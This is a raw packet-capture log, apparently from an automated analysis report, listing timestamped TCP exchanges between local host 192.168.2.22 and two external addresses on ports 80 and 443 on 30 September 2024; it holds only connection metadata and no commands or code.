                                                                                                                                                                                                Sep 30, 2024 16:24:27.567982912 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.568097115 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.568139076 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609436035 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609507084 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609513998 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609546900 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609559059 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609606028 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609610081 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609647036 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609657049 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609682083 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609688997 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609715939 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609719038 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609766006 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609766006 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609801054 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609808922 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609846115 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609849930 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609883070 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609890938 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609931946 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609932899 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609966993 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609972954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.609999895 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610007048 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610034943 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610038996 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610084057 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610085964 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610121965 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610126972 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610147953 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610168934 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610174894 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610209942 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610230923 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610275984 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610300064 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610332966 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610340118 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610373974 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610383987 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610418081 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610450029 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610466957 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610490084 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610502958 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610527992 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610534906 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610541105 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610574007 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610589981 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610621929 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610630035 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610655069 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610665083 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610690117 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610690117 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610728025 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610759974 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610791922 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610822916 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610838890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610855103 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610860109 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610888958 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610896111 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610920906 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610924959 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610955000 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610960960 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610987902 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.610991955 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611022949 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611027002 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611057043 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611063004 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611089945 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611099005 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611121893 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611130953 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611154079 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611155033 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611186981 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611191988 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611218929 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611222982 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611254930 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611255884 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.611298084 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:28.745800972 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:29.455770016 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:29.455840111 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:32.642316103 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:32.642359972 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:32.642429113 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:32.645802975 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:32.645818949 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.113912106 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.113990068 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.120874882 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.120883942 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.121238947 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.223375082 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.267411947 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457354069 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457416058 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457442045 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457462072 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457468033 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457499981 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.457518101 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.465895891 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.465935946 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.465943098 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.465961933 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.465993881 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.465998888 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.466006041 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.466039896 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.466047049 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.472670078 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.472719908 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.472738981 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.555988073 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556031942 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556056976 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556077957 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556107998 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556113005 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556122065 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556154013 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556163073 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556200027 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556225061 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556235075 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556241989 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556274891 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556847095 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.556998014 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557132006 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557159901 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557163000 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557173967 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557202101 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557729006 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557809114 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557888985 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557914972 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557923079 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.557974100 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.558573008 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.558666945 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.558691025 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.558701992 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.558708906 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.558743000 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.559494019 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.559567928 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.559600115 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.559607029 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.562213898 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.562329054 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.634916067 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.634932995 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.634957075 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.634974003 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.634991884 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.635008097 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.635014057 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.635042906 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.636604071 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.636632919 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.636668921 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.636677027 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.636688948 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.640145063 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.645363092 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.645390034 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.645412922 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.645420074 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.645445108 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.645551920 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.690968037 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.690994024 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.691025019 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.691042900 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.691054106 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.691088915 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.723786116 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.723809004 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.723845959 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.723856926 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.723881006 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.724689960 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.724715948 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.724736929 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.724745035 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.724756956 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.724783897 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.725681067 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.725701094 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.725732088 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.725738049 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.725756884 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.725756884 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.733781099 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.733804941 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.733827114 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.733836889 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.733848095 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734137058 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734648943 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734669924 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734689951 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734697104 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734714985 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.734785080 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779150963 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779175997 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779236078 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779248953 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779266119 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779867887 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779892921 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779938936 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779947996 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.779997110 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.812205076 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.812228918 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.812283039 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.812294960 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.812329054 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.812995911 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813024044 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813055038 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813062906 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813081026 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813146114 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813334942 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813355923 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813385963 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813391924 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.813404083 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814111948 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814136982 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814146042 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814172983 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814177990 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814194918 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.814315081 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.822813034 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.822839022 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.822882891 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.822894096 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.822998047 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.823024035 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.823040009 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.823048115 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.823066950 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.831192970 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.868087053 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.868113995 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.868189096 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.868204117 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.872304916 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900145054 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900168896 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900237083 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900248051 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900273085 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900549889 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900577068 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900593996 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:33.900602102 CEST44349172185.199.109.133192.168.2.22
